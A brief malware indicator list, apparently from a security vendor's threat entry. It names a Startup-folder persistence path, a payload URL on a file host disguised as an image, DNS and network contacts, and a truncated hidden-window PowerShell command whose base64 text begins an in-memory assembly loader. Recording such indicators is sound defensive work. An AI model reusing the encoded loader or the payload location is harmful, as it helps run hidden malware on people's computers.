Technical Information
- %APPDATA%\microsoft\windows\start menu\programs\startup\<File name>.exe
- https://k.top4top.io/p_1472xh4hx1.jpg
- 'k.###4top.io':443
- DNS ASK k.###4top.io
- '<SYSTEM32>\cmd.exe' /c start /b powershell -noP -sta -w 1 -enc WwBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAGIAYQBzAGUANgA0AFMAdAByAG...' (with hidden window)